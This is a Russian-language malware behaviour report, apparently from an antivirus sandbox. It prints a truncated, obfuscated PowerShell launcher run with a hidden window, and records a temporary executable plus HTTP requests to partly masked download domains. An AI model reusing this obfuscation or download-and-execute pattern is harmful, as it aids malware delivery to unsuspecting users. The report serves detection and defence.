Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $ENV:cOMSpeC[4,26,25]-joiN'') (( [cHaR[]]( 9 , 127 ,87 ,107,71 ,124 ,13,16 , 13, 67 , 72 , 90, 0,66, 79,71, 72, 78 ,89, 13, 95,76 , 67 , 73,66 , 64 , 22 ,9, 105,110, 126, 75,116 ,13,16,13, ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\275699.exe
Удаляет следующие файлы
- %TEMP%\275699.exe
Сетевая активность
Подключается к
- 'af###rowth.org':80
- 'es##########ntos.sintinovoy.sevapp20.com':80
- 'ho####dselection.nl':80
- 'ho####dselection.nl':443
TCP
Запросы HTTP GET
- http://af###rowth.org/xQydN/
- http://es##########ntos.sintinovoy.sevapp20.com/yuKf/
- http://www.ho####dselection.nl/Pb6DnX/
Другие
- 'ho####dselection.nl':443
UDP
- DNS ASK bi####dovovo.com
- DNS ASK la#.#yudu.tech
- DNS ASK af###rowth.org
- DNS ASK es##########ntos.sintinovoy.sevapp20.com
- DNS ASK ho####dselection.nl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $ENV:cOMSpeC[4,26,25]-joiN'') (( [cHaR[]]( 9 , 127 ,87 ,107,71 ,124 ,13,16 , 13, 67 , 72 , 90, 0,66, 79,71, 72, 78 ,89, 13, 95,76 , 67 , 73,66 , 64 , 22 ,9, 105,110, 126, 75,116 ,13,16,13, ...' (со скрытым окном)
